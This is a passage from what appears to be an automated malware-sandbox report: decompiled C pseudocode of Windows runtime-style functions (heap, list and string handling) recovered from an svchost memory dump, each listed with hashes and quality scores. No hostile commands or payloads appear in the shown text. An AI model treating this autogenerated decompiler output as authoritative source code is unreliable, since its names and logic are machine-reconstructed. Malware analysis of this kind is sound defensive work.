                                          									_v80 = _v80 | 0xffffffff;
                                          									_push( &_v84);
                                          									_push(0);
                                          									_push(_v64);
                                          									_v84 = 0xfa0a1f00;
                                          									E03A69520();
                                          								}
                                          							}
                                          						}
                                          					}
                                          				}
                                          				if(_v64 != 0) {
                                          					_push(_v64);
                                          					E03A695D0();
                                          					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
                                          					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
                                          				}
                                          				if(_t77 != 0) {
                                          					E03A3FFB0(_t68, _t77, 0x3b18778);
                                          				}
                                          				_pop(_t78);
                                          				return E03A6B640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
                                          			}

































                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 50f38a92bb24fce9e59e7366cfca366e66b270084f061f22abcd6642c75d5c38
                                          • Instruction ID: a3ffd0449bb119de04ad64b06d6d5e19e0b0ca68aa1014bcec02b74f32a8724b
                                          • Opcode Fuzzy Hash: 50f38a92bb24fce9e59e7366cfca366e66b270084f061f22abcd6642c75d5c38
                                          • Instruction Fuzzy Hash: 79416CB2E00708AFDB14DFA9D940BAEFBF4EF48714F08852AE814A7250DB709905CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 85%
                                          			E03A25210(intOrPtr _a4, void* _a8) {
                                          				void* __ecx;
                                          				intOrPtr _t31;
                                          				signed int _t32;
                                          				signed int _t33;
                                          				intOrPtr _t35;
                                          				signed int _t52;
                                          				void* _t54;
                                          				void* _t56;
                                          				unsigned int _t59;
                                          				signed int _t60;
                                          				void* _t61;
                                          
                                          				_t61 = E03A252A5(1);
                                          				if(_t61 == 0) {
                                          					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
                                          					_t54 =  *((intOrPtr*)(_t31 + 0x28));
                                          					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
                                          				} else {
                                          					_t54 =  *((intOrPtr*)(_t61 + 0x10));
                                          					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
                                          				}
                                          				_t60 = _t59 >> 1;
                                          				_t32 = 0x3a;
                                          				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
                                          					_t52 = _t60 + _t60;
                                          					if(_a4 > _t52) {
                                          						goto L5;
                                          					}
                                          					if(_t61 != 0) {
                                          						asm("lock xadd [esi], eax");
                                          						if((_t32 | 0xffffffff) == 0) {
                                          							_push( *((intOrPtr*)(_t61 + 4)));
                                          							E03A695D0();
                                          							L03A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
                                          						}
                                          					} else {
                                          						E03A3EB70(_t54, 0x3b179a0);
                                          					}
                                          					_t26 = _t52 + 2; // 0xddeeddf0
                                          					return _t26;
                                          				} else {
                                          					_t52 = _t60 + _t60;
                                          					if(_a4 < _t52) {
                                          						if(_t61 != 0) {
                                          							asm("lock xadd [esi], eax");
                                          							if((_t32 | 0xffffffff) == 0) {
                                          								_push( *((intOrPtr*)(_t61 + 4)));
                                          								E03A695D0();
                                          								L03A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
                                          							}
                                          						} else {
                                          							E03A3EB70(_t54, 0x3b179a0);
                                          						}
                                          						return _t52;
                                          					}
                                          					L5:
                                          					_t33 = E03A6F3E0(_a8, _t54, _t52);
                                          					if(_t61 == 0) {
                                          						E03A3EB70(_t54, 0x3b179a0);
                                          					} else {
                                          						asm("lock xadd [esi], eax");
                                          						if((_t33 | 0xffffffff) == 0) {
                                          							_push( *((intOrPtr*)(_t61 + 4)));
                                          							E03A695D0();
                                          							L03A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
                                          						}
                                          					}
                                          					_t35 = _a8;
                                          					if(_t60 <= 1) {
                                          						L9:
                                          						_t60 = _t60 - 1;
                                          						 *((short*)(_t52 + _t35 - 2)) = 0;
                                          						goto L10;
                                          					} else {
                                          						_t56 = 0x3a;
                                          						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
                                          							 *((short*)(_t52 + _t35)) = 0;
                                          							L10:
                                          							return _t60 + _t60;
                                          						}
                                          						goto L9;
                                          					}
                                          				}
                                          			}














                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 58790ea76959908ff89632295d381863e2865ff7172e46ec57ba7e5dc62ac584
                                          • Instruction ID: 1349a3567e036c7c8ebc605598dec7ec9049028bdbc34758d6d13c81cae740c5
                                          • Opcode Fuzzy Hash: 58790ea76959908ff89632295d381863e2865ff7172e46ec57ba7e5dc62ac584
                                          • Instruction Fuzzy Hash: D531A231641710EBC72AEB18CE41B66BBA5BF41764F15462BE4554B6A0EB70E804C790
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 78%
                                          			E03A5A61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                          				intOrPtr _t35;
                                          				intOrPtr _t39;
                                          				intOrPtr _t45;
                                          				intOrPtr* _t51;
                                          				intOrPtr* _t52;
                                          				intOrPtr* _t55;
                                          				signed int _t57;
                                          				intOrPtr* _t59;
                                          				intOrPtr _t68;
                                          				intOrPtr* _t77;
                                          				void* _t79;
                                          				signed int _t80;
                                          				intOrPtr _t81;
                                          				char* _t82;
                                          				void* _t83;
                                          
                                          				_push(0x24);
                                          				_push(0x3b00220);
                                          				E03A7D08C(__ebx, __edi, __esi);
                                          				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
                                          				_t79 = __ecx;
                                          				_t35 =  *0x3b17b9c; // 0x0
                                          				_t55 = L03A44620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
                                          				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
                                          				if(_t55 == 0) {
                                          					_t39 = 0xc0000017;
                                          					L11:
                                          					return E03A7D0D1(_t39);
                                          				}
                                          				_t68 = 0;
                                          				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
                                          				 *(_t83 - 4) =  *(_t83 - 4) & 0;
                                          				_t7 = _t55 + 8; // 0x8
                                          				_t57 = 6;
                                          				memcpy(_t7, _t79, _t57 << 2);
                                          				_t80 = 0xfffffffe;
                                          				 *(_t83 - 4) = _t80;
                                          				if(0 < 0) {
                                          					L14:
                                          					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
                                          					L20:
                                          					L03A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
                                          					_t39 = _t81;
                                          					goto L11;
                                          				}
                                          				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
                                          					_t81 = 0xc000007b;
                                          					goto L20;
                                          				}
                                          				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
                                          					_t59 =  *((intOrPtr*)(_t83 + 8));
                                          					_t45 =  *_t59;
                                          					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
                                          					 *_t59 = _t45 + 1;
                                          					L6:
                                          					 *(_t83 - 4) = 1;
                                          					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
                                          					 *(_t83 - 4) = _t80;
                                          					if(_t68 < 0) {
                                          						_t82 =  *((intOrPtr*)(_t83 + 0xc));
                                          						if(_t82 == 0) {
                                          							goto L14;
                                          						}
                                          						asm("btr eax, ecx");
                                          						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
                                          						if( *_t82 != 0) {
                                          							 *0x3b17b10 =  *0x3b17b10 - 8;
                                          						}
                                          						goto L20;
                                          					}
                                          					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
                                          					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
                                          					_t51 =  *0x3b1536c; // 0x77995368
                                          					if( *_t51 != 0x3b15368) {
                                          						_push(3);
                                          						asm("int 0x29");
                                          						goto L14;
                                          					}
                                          					 *_t55 = 0x3b15368;
                                          					 *((intOrPtr*)(_t55 + 4)) = _t51;
                                          					 *_t51 = _t55;
                                          					 *0x3b1536c = _t55;
                                          					_t52 =  *((intOrPtr*)(_t83 + 0x10));
                                          					if(_t52 != 0) {
                                          						 *_t52 = _t55;
                                          					}
                                          					_t39 = 0;
                                          					goto L11;
                                          				}
                                          				_t77 =  *((intOrPtr*)(_t83 + 8));
                                          				_t68 = E03A5A70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
                                          				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
                                          				if(_t68 < 0) {
                                          					goto L14;
                                          				}
                                          				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
                                          				goto L6;
                                          			}


















                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5433ea55986fbab4c80a3d2589da43abebd6023b707a2d61a0620b4cddaf2313
                                          • Instruction ID: c9caf325393d662c8e8ab88006311557cfbcfa907f5e7f5ce246008dca17a7c2
                                          • Opcode Fuzzy Hash: 5433ea55986fbab4c80a3d2589da43abebd6023b707a2d61a0620b4cddaf2313
                                          • Instruction Fuzzy Hash: FA4168B5B01205EFCB15CF58D990B9ABBF1BB89304F1881AEE805AF744C778A901CF50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E03A63D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
                                          				intOrPtr _v8;
                                          				char _v12;
                                          				signed short** _t33;
                                          				short* _t38;
                                          				intOrPtr* _t39;
                                          				intOrPtr* _t41;
                                          				signed short _t43;
                                          				intOrPtr* _t47;
                                          				intOrPtr* _t53;
                                          				signed short _t57;
                                          				intOrPtr _t58;
                                          				signed short _t60;
                                          				signed short* _t61;
                                          
                                          				_t47 = __ecx;
                                          				_t61 = __edx;
                                          				_t60 = ( *__ecx & 0x0000ffff) + 2;
                                          				if(_t60 > 0xfffe) {
                                          					L22:
                                          					return 0xc0000106;
                                          				}
                                          				if(__edx != 0) {
                                          					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
                                          						L5:
                                          						E03A37B60(0, _t61, 0x3a011c4);
                                          						_v12 =  *_t47;
                                          						_v12 = _v12 + 0xfff8;
                                          						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
                                          						E03A37B60(0xfff8, _t61,  &_v12);
                                          						_t33 = _a8;
                                          						if(_t33 != 0) {
                                          							 *_t33 = _t61;
                                          						}
                                          						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
                                          						_t53 = _a12;
                                          						if(_t53 != 0) {
                                          							_t57 = _t61[2];
                                          							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
                                          							while(_t38 >= _t57) {
                                          								if( *_t38 == 0x5c) {
                                          									_t41 = _t38 + 2;
                                          									if(_t41 == 0) {
                                          										break;
                                          									}
                                          									_t58 = 0;
                                          									if( *_t41 == 0) {
                                          										L19:
                                          										 *_t53 = _t58;
                                          										goto L7;
                                          									}
                                          									 *_t53 = _t41;
                                          									goto L7;
                                          								}
                                          								_t38 = _t38 - 2;
                                          							}
                                          							_t58 = 0;
                                          							goto L19;
                                          						} else {
                                          							L7:
                                          							_t39 = _a16;
                                          							if(_t39 != 0) {
                                          								 *_t39 = 0;
                                          								 *((intOrPtr*)(_t39 + 4)) = 0;
                                          								 *((intOrPtr*)(_t39 + 8)) = 0;
                                          								 *((intOrPtr*)(_t39 + 0xc)) = 0;
                                          							}
                                          							return 0;
                                          						}
                                          					}
                                          					_t61 = _a4;
                                          					if(_t61 != 0) {
                                          						L3:
                                          						_t43 = L03A44620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
                                          						_t61[2] = _t43;
                                          						if(_t43 == 0) {
                                          							return 0xc0000017;
                                          						}
                                          						_t61[1] = _t60;
                                          						 *_t61 = 0;
                                          						goto L5;
                                          					}
                                          					goto L22;
                                          				}
                                          				_t61 = _a4;
                                          				if(_t61 == 0) {
                                          					return 0xc000000d;
                                          				}
                                          				goto L3;
                                          			}
















                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4efe2daad21bd2a1fe64cb2446017a72ac91eeb91d7087bb2842c9d2f0ea7fb9
                                          • Instruction ID: 9c42f2aa86114067562b53bb9f27d496b07f8316519204d6484f1a346f62ecbf
                                          • Opcode Fuzzy Hash: 4efe2daad21bd2a1fe64cb2446017a72ac91eeb91d7087bb2842c9d2f0ea7fb9
                                          • Instruction Fuzzy Hash: 1131B039600614DBDB24CF29C841A7EBBF5EF4570070985AFE845DB3A1E730D842C7A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 68%
                                          			E03A4C182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
                                          				signed int* _v8;
                                          				char _v16;
                                          				void* __ebx;
                                          				void* __edi;
                                          				signed char _t33;
                                          				signed char _t43;
                                          				signed char _t48;
                                          				signed char _t62;
                                          				void* _t63;
                                          				intOrPtr _t69;
                                          				intOrPtr _t71;
                                          				unsigned int* _t82;
                                          				void* _t83;
                                          
                                          				_t80 = __ecx;
                                          				_t82 = __edx;
                                          				_t33 =  *((intOrPtr*)(__ecx + 0xde));
                                          				_t62 = _t33 >> 0x00000001 & 0x00000001;
                                          				if((_t33 & 0x00000001) != 0) {
                                          					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
                                          					if(E03A47D50() != 0) {
                                          						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                          					} else {
                                          						_t43 = 0x7ffe0386;
                                          					}
                                          					if( *_t43 != 0) {
                                          						_t43 = E03AF8D34(_v8, _t80);
                                          					}
                                          					E03A42280(_t43, _t82);
                                          					if( *((char*)(_t80 + 0xdc)) == 0) {
                                          						E03A3FFB0(_t62, _t80, _t82);
                                          						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
                                          						_t30 = _t80 + 0xd0; // 0xd0
                                          						_t83 = _t30;
                                          						E03AF8833(_t83,  &_v16);
                                          						_t81 = _t80 + 0x90;
                                          						E03A3FFB0(_t62, _t80 + 0x90, _t80 + 0x90);
                                          						_t63 = 0;
                                          						_push(0);
                                          						_push(_t83);
                                          						_t48 = E03A6B180();
                                          						if(_a4 != 0) {
                                          							E03A42280(_t48, _t81);
                                          						}
                                          					} else {
                                          						_t69 = _v8;
                                          						_t12 = _t80 + 0x98; // 0x98
                                          						_t13 = _t69 + 0xc; // 0x575651ff
                                          						E03A4BB2D(_t13, _t12);
                                          						_t71 = _v8;
                                          						_t15 = _t80 + 0xb0; // 0xb0
                                          						_t16 = _t71 + 8; // 0x8b000cc2
                                          						E03A4BB2D(_t16, _t15);
                                          						E03A4B944(_v8, _t62);
                                          						 *((char*)(_t80 + 0xdc)) = 0;
                                          						E03A3FFB0(0, _t80, _t82);
                                          						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
                                          						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
                                          						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
                                          						 *(_t80 + 0xde) = 0;
                                          						if(_a4 == 0) {
                                          							_t25 = _t80 + 0x90; // 0x90
                                          							E03A3FFB0(0, _t80, _t25);
                                          						}
                                          						_t63 = 1;
                                          					}
                                          					return _t63;
                                          				}
                                          				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
                                          				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
                                          				if(_a4 == 0) {
                                          					_t24 = _t80 + 0x90; // 0x90
                                          					E03A3FFB0(0, __ecx, _t24);
                                          				}
                                          				return 0;
                                          			}

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                          • Instruction ID: 022acf20bc45a9683be9abd12916d68258fcf18771cea4d73c964b5d0fdfbfbe
                                          • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                          • Instruction Fuzzy Hash: 8E312B75A0664ABFDB08EBB4C580BE9F768BF82214F08415BD41C5B301DB345A45D7E0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 76%
                                          			E03AA7016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
                                          				signed int _v8;
                                          				char _v588;
                                          				intOrPtr _v592;
                                          				intOrPtr _v596;
                                          				signed short* _v600;
                                          				char _v604;
                                          				short _v606;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				signed short* _t55;
                                          				void* _t56;
                                          				signed short* _t58;
                                          				signed char* _t61;
                                          				char* _t68;
                                          				void* _t69;
                                          				void* _t71;
                                          				void* _t72;
                                          				signed int _t75;
                                          
                                          				_t64 = __edx;
                                          				_t77 = (_t75 & 0xfffffff8) - 0x25c;
                                          				_v8 =  *0x3b1d360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
                                          				_t55 = _a16;
                                          				_v606 = __ecx;
                                          				_t71 = 0;
                                          				_t58 = _a12;
                                          				_v596 = __edx;
                                          				_v600 = _t58;
                                          				_t68 =  &_v588;
                                          				if(_t58 != 0) {
                                          					_t71 = ( *_t58 & 0x0000ffff) + 2;
                                          					if(_t55 != 0) {
                                          						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
                                          					}
                                          				}
                                          				_t8 = _t71 + 0x2a; // 0x28
                                          				_t33 = _t8;
                                          				_v592 = _t8;
                                          				if(_t71 <= 0x214) {
                                          					L6:
                                          					 *((short*)(_t68 + 6)) = _v606;
                                          					if(_t64 != 0xffffffff) {
                                          						asm("cdq");
                                          						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
                                          						 *((char*)(_t68 + 0x28)) = _a4;
                                          						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
                                          						 *((char*)(_t68 + 0x29)) = _a8;
                                          						if(_t71 != 0) {
                                          							_t22 = _t68 + 0x2a; // 0x2a
                                          							_t64 = _t22;
                                          							E03AA6B4C(_t58, _t22, _t71,  &_v604);
                                          							if(_t55 != 0) {
                                          								_t25 = _v604 + 0x2a; // 0x2a
                                          								_t64 = _t25 + _t68;
                                          								E03AA6B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
                                          							}
                                          							if(E03A47D50() == 0) {
                                          								_t61 = 0x7ffe0384;
                                          							} else {
                                          								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                          							}
                                          							_push(_t68);
                                          							_push(_v592 + 0xffffffe0);
                                          							_push(0x402);
                                          							_push( *_t61 & 0x000000ff);
                                          							E03A69AE0();
                                          						}
                                          					}
                                          					_t35 =  &_v588;
                                          					if( &_v588 != _t68) {
                                          						_t35 = L03A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
                                          					}
                                          					L16:
                                          					_pop(_t69);
                                          					_pop(_t72);
                                          					_pop(_t56);
                                          					return E03A6B640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
                                          				}
                                          				_t68 = L03A44620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
                                          				if(_t68 == 0) {
                                          					goto L16;
                                          				} else {
                                          					_t58 = _v600;
                                          					_t64 = _v596;
                                          					goto L6;
                                          				}
                                          			}

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7357e7a94b441e2dd79ec2436e51090ca2fe37300025c3a645fcb7ccbc10ebc1
                                          • Instruction ID: d489c671da33e2114358b0009f5354ea2382a3ec67f6dcbf23fcef8c1b1521a8
                                          • Opcode Fuzzy Hash: 7357e7a94b441e2dd79ec2436e51090ca2fe37300025c3a645fcb7ccbc10ebc1
                                          • Instruction Fuzzy Hash: 4A317376604B519BC321DF68C950A6BB7E5BFC8600F084A2EF8959B790E731E904CBA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 70%
                                          			E03AD3D40(intOrPtr __ecx, char* __edx) {
                                          				signed int _v8;
                                          				char* _v12;
                                          				intOrPtr _v16;
                                          				intOrPtr _v20;
                                          				signed char _v24;
                                          				char _v28;
                                          				char _v29;
                                          				intOrPtr* _v32;
                                          				char _v36;
                                          				char _v37;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				signed char _t34;
                                          				intOrPtr* _t37;
                                          				intOrPtr* _t42;
                                          				intOrPtr* _t47;
                                          				intOrPtr* _t48;
                                          				intOrPtr* _t49;
                                          				char _t51;
                                          				void* _t52;
                                          				intOrPtr* _t53;
                                          				char* _t55;
                                          				char _t59;
                                          				char* _t61;
                                          				intOrPtr* _t64;
                                          				void* _t65;
                                          				char* _t67;
                                          				void* _t68;
                                          				signed int _t70;
                                          
                                          				_t62 = __edx;
                                          				_t72 = (_t70 & 0xfffffff8) - 0x1c;
                                          				_v8 =  *0x3b1d360 ^ (_t70 & 0xfffffff8) - 0x0000001c;
                                          				_t34 =  &_v28;
                                          				_v20 = __ecx;
                                          				_t67 = __edx;
                                          				_v24 = _t34;
                                          				_t51 = 0;
                                          				_v12 = __edx;
                                          				_v29 = 0;
                                          				_v28 = _t34;
                                          				E03A42280(_t34, 0x3b18a6c);
                                          				_t64 =  *0x3b15768; // 0x77995768
                                          				if(_t64 != 0x3b15768) {
                                          					while(1) {
                                          						_t8 = _t64 + 8; // 0x77995770
                                          						_t42 = _t8;
                                          						_t53 = _t64;
                                          						 *_t42 =  *_t42 + 1;
                                          						_v16 = _t42;
                                          						E03A3FFB0(_t53, _t64, 0x3b18a6c);
                                          						 *0x3b1b1e0(_v24, _t67);
                                          						if( *((intOrPtr*)( *((intOrPtr*)(_t64 + 0xc))))() != 0) {
                                          							_v37 = 1;
                                          						}
                                          						E03A42280(_t45, 0x3b18a6c);
                                          						_t47 = _v28;
                                          						_t64 =  *_t64;
                                          						 *_t47 =  *_t47 - 1;
                                          						if( *_t47 != 0) {
                                          							goto L8;
                                          						}
                                          						if( *((intOrPtr*)(_t64 + 4)) != _t53) {
                                          							L10:
                                          							_push(3);
                                          							asm("int 0x29");
                                          						} else {
                                          							_t48 =  *((intOrPtr*)(_t53 + 4));
                                          							if( *_t48 != _t53) {
                                          								goto L10;
                                          							} else {
                                          								 *_t48 = _t64;
                                          								_t61 =  &_v36;
                                          								 *((intOrPtr*)(_t64 + 4)) = _t48;
                                          								_t49 = _v32;
                                          								if( *_t49 != _t61) {
                                          									goto L10;
                                          								} else {
                                          									 *_t53 = _t61;
                                          									 *((intOrPtr*)(_t53 + 4)) = _t49;
                                          									 *_t49 = _t53;
                                          									_v32 = _t53;
                                          									goto L8;
                                          								}
                                          							}
                                          						}
                                          						L11:
                                          						_t51 = _v29;
                                          						goto L12;
                                          						L8:
                                          						if(_t64 != 0x3b15768) {
                                          							_t67 = _v20;
                                          							continue;
                                          						}
                                          						goto L11;
                                          					}
                                          				}
                                          				L12:
                                          				E03A3FFB0(_t51, _t64, 0x3b18a6c);
                                          				while(1) {
                                          					_t37 = _v28;
                                          					_t55 =  &_v28;
                                          					if(_t37 == _t55) {
                                          						break;
                                          					}
                                          					if( *((intOrPtr*)(_t37 + 4)) != _t55) {
                                          						goto L10;
                                          					} else {
                                          						_t59 =  *_t37;
                                          						if( *((intOrPtr*)(_t59 + 4)) != _t37) {
                                          							goto L10;
                                          						} else {
                                          							_t62 =  &_v28;
                                          							_v28 = _t59;
                                          							 *((intOrPtr*)(_t59 + 4)) =  &_v28;
                                          							L03A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t37);
                                          							continue;
                                          						}
                                          					}
                                          					L18:
                                          				}
                                          				_pop(_t65);
                                          				_pop(_t68);
                                          				_pop(_t52);
                                          				return E03A6B640(_t51, _t52, _v8 ^ _t72, _t62, _t65, _t68);
                                          				goto L18;
                                          			}

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6d09b6ba6b516b36329efbf66709470a0d7b9ae20036696621c4498ca72b0a5f
                                          • Instruction ID: 98524ec408bfaee4488b4827b9a933b2812f56d29aae1df64cb163f6ad1398a2
                                          • Opcode Fuzzy Hash: 6d09b6ba6b516b36329efbf66709470a0d7b9ae20036696621c4498ca72b0a5f
                                          • Instruction Fuzzy Hash: 65317A7A909302CFCB14DF14D58051ABBE5FF85604F4849AFF4999B291D730DD14CBA2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 92%
                                          			E03A5A70E(intOrPtr* __ecx, char* __edx) {
                                          				unsigned int _v8;
                                          				intOrPtr* _v12;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				void* _t16;
                                          				intOrPtr _t17;
                                          				intOrPtr _t28;
                                          				char* _t33;
                                          				intOrPtr _t37;
                                          				intOrPtr _t38;
                                          				void* _t50;
                                          				intOrPtr _t52;
                                          
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_t52 =  *0x3b17b10; // 0x0
                                          				_t33 = __edx;
                                          				_t48 = __ecx;
                                          				_v12 = __ecx;
                                          				if(_t52 == 0) {
                                          					 *0x3b17b10 = 8;
                                          					 *0x3b17b14 = 0x3b17b0c;
                                          					 *0x3b17b18 = 1;
                                          					L6:
                                          					_t2 = _t52 + 1; // 0x1
                                          					E03A5A990(0x3b17b10, _t2, 7);
                                          					asm("bts ecx, eax");
                                          					 *_t48 = _t52;
                                          					 *_t33 = 1;
                                          					L3:
                                          					_t16 = 0;
                                          					L4:
                                          					return _t16;
                                          				}
                                          				_t17 = L03A5A840(__edx, __ecx, __ecx, _t52, 0x3b17b10, 1, 0);
                                          				if(_t17 == 0xffffffff) {
                                          					_t37 =  *0x3b17b10; // 0x0
                                          					_t3 = _t37 + 0x27; // 0x27
                                          					__eflags = _t3 >> 5 -  *0x3b17b18; // 0x0
                                          					if(__eflags > 0) {
                                          						_t38 =  *0x3b17b9c; // 0x0
                                          						_t4 = _t52 + 0x27; // 0x27
                                          						_v8 = _t4 >> 5;
                                          						_t50 = L03A44620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
                                          						__eflags = _t50;
                                          						if(_t50 == 0) {
                                          							_t16 = 0xc0000017;
                                          							goto L4;
                                          						}
                                          						 *0x3b17b18 = _v8;
                                          						_t8 = _t52 + 7; // 0x7
                                          						E03A6F3E0(_t50,  *0x3b17b14, _t8 >> 3);
                                          						_t28 =  *0x3b17b14; // 0x0
                                          						__eflags = _t28 - 0x3b17b0c;
                                          						if(_t28 != 0x3b17b0c) {
                                          							L03A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
                                          						}
                                          						_t9 = _t52 + 8; // 0x8
                                          						 *0x3b17b14 = _t50;
                                          						_t48 = _v12;
                                          						 *0x3b17b10 = _t9;
                                          						goto L6;
                                          					}
                                          					 *0x3b17b10 = _t37 + 8;
                                          					goto L6;
                                          				}
                                          				 *__ecx = _t17;
                                          				 *_t33 = 0;
                                          				goto L3;
                                          			}

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 85ba6b0c6d8c529377426b356d2c2526c05ab727807a2bc9d4aa6bcd316c2ee9
